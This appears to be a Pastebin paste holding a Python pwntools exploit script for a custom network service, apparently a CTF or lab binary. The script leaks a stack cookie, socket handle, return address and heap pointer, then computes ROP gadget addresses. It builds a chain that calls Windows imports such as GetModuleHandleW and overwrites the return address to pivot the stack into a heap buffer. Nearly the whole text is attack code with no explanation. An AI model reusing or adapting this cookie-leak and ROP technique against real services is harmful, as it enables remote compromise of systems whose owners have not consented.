Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import socket
- import time
- from pwn import *
- context.os = 'linux'
- context.arch = 'amd64'
- # context.log_level = 'DEBUG'
- # HOST = '172.27.223.171'
- HOST = '192.168.1.34'
- PORT = 741
- elf = remote(HOST, PORT)
- def send_data(data):
- elf.send(data)
- time.sleep(0.2)
- def recv_data():
- return elf.recv()
- def send_cmd1(data):
- header = b'\x01\x00\x00\x00'
- l = bytes([int(len(data) / 2)>>2])
- header += l
- send_data(header + data)
- def leak_nth_dword(n):
- start = bytes([n*2])
- send_data(b'\x04\x00\x00\x01' + start)
- four_bytes = recv_data()
- send_data(b'\x04\x00\x00\x01' + bytes([int.from_bytes(start, 'little') + 1]))
- four_bytes += recv_data()
- return four_bytes
- print("Leaking stuff...")
- leaked_cookie = u64(leak_nth_dword(0))
- print("Leaked cookie : {}".format(hex(leaked_cookie)))
- leaked_mem_priv = u64(leak_nth_dword(1))
- print("Leaked memory privleges : {}".format(hex(leaked_mem_priv)))
- leacked_sockfd = u64(leak_nth_dword(2))
- print("Leaked socket : {}".format(hex(leacked_sockfd)))
- leacked_ret = u64(leak_nth_dword(3))
- print("Leakead ret : {}".format(hex(leacked_ret)))
- leaked_allocBuffer = u64(leak_nth_dword(4))
- print("Leakead allocated buffer on heap : {}".format(hex(leaked_allocBuffer)))
- base_addr = leacked_ret - 0x2507
- print("Computed base addr : {}".format(hex(base_addr)))
- pop_rsp_ret = base_addr + 0x4d4a
- syscall = base_addr + 0x33acc
- pop_rcx_ret = base_addr + 0x13603
- pop_rdx_ret = base_addr + 0x1b4be
- pop_r8_ret = base_addr + 0x3a6d
- pop_rcx_ret = base_addr + 0x13603
- pop_rax_ret = base_addr + 0x3a6e
- pop_rbx_ret = base_addr + 0x132c
- j_rax = base_addr + 0x907d
- call_qword_ptr_rax_add_rsp_0x38_ret = base_addr + 0x194a
- cmovne_r9d_r8d_movzx_eax_r9d_ret = base_addr + 0x752cb
- xor_rax_rax_ret = base_addr + 0x3148f
- xor_eax_edx_ret = base_addr + 0x3113c
- add_resp_0x28_ret = base_addr + 0x1194
- mov_rcx_rax_call_qwordptr_r8 = base_addr + 0x1946
- print("Starting ROP ...".format(hex(pop_rsp_ret)))
- GetModuleHandleWAddr = base_addr + 0x7b1f8
- LoadLibraryExWAddr = base_addr + 0x7b2d8
- CreateThreadAddr = base_addr + 0x7b0a8
- ResumeThreadAddr = base_addr + 0x7b0f0
- VirtuallAllocAddr = base_addr + 0x7b098
- GetProcAddressAddr = base_addr + 0x7b0b8
- ReadFileAddr = base_addr + 0x7b088
- start_rop = leaked_allocBuffer + 0x230 # Keep some space for structures etc...
- ropchain = b''
- ropchain += b'\x00' * 11
- ropchain += b'w\x00s\x002\x00_\x003\x002\x00.\x00d\x00l\x00l\x00\x00'
- ropchain += b'\x00' * 11
- ropchain += b'A' * 0x200
- ropchain += p64(pop_rcx_ret)
- ropchain += p64(leaked_allocBuffer + 0x10) # Lstr_kernel32
- ropchain += p64(pop_rax_ret)
- ropchain += p64(GetModuleHandleWAddr)
- ropchain += p64(call_qword_ptr_rax_add_rsp_0x38_ret) # call [rax]; add rsp, 38; ret
- ropchain += b'B' * (0x38)
- # Ret to send instruction base_addr + 0x25b9
- ropchain += p64(pop_rcx_ret)
- ropchain += p64(leacked_sockfd)
- ropchain += p64(pop_rdx_ret)
- ropchain += p64(leaked_allocBuffer + 0x258 + 0x10)
- ropchain += p64(pop_r8_ret)
- ropchain += p64(0x0)
- ropchain += p64(xor_eax_edx_ret) # TO UNSET ZERO FLAG for cmovne
- ropchain += p64(cmovne_r9d_r8d_movzx_eax_r9d_ret)
- ropchain += p64(pop_r8_ret)
- ropchain += p64(0x8)
- ropchain += p64(pop_rax_ret)
- ropchain += p64(base_addr + 0x25b9)
- ropchain += p64(j_rax)
- # # VirtualAlloc to up memory size
- # ropchain += p64(pop_rcx_ret)
- # ropchain += p64(leaked_allocBuffer)
- # ropchain += p64(pop_rdx_ret)
- # ropchain += p64(0x1000)
- # ropchain += p64(pop_r8_ret)
- # ropchain += p64(0x40) # Make it executable why not ...
- # ropchain += p64(xor_eax_edx_ret) # TO UNSET ZERO FLAG for cmovne
- # ropchain += p64(cmovne_r9d_r8d_movzx_eax_r9d_ret)
- # ropchain += p64(pop_r8_ret)
- # ropchain += p64(0x1000)
- # ropchain += p64(pop_rax_ret)
- # ropchain += p64(VirtuallAllocAddr)
- # ropchain += p64(call_qword_ptr_rax_add_rsp_0x38_ret)
- # ropchain += b'B' * 0x38
- # ropchain += p64(pop_rax_ret)
- # ropchain += p64(leaked_allocBuffer + 0x1b8)
- # ropchain += p64(j_rax)
- # ropchain += p64(pop_r8_ret)
- # ropchain += p64(GetProcAddressAddr)
- # ropchain += p64(pop_rdx_ret)
- # ropchain += p64(leaked_allocBuffer + 0x30)
- # ropchain += p64(mov_rcx_rax_call_qwordptr_r8)
- payload = ropchain + b'C' * (1024 - len(ropchain)) # Add padding to get to the ret addr
- payload += p64(leaked_cookie)
- payload += p64(leaked_mem_priv)
- payload += p64(leacked_sockfd)
- payload += p64(pop_rsp_ret) # Override ret to pop rsp
- payload += p64(start_rop) # Stack pivot rsp to allocated buffer on heap (+0x8)
- send_cmd1(payload)
- send_data(b'\x05')
- print(recv_data())
- elf.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement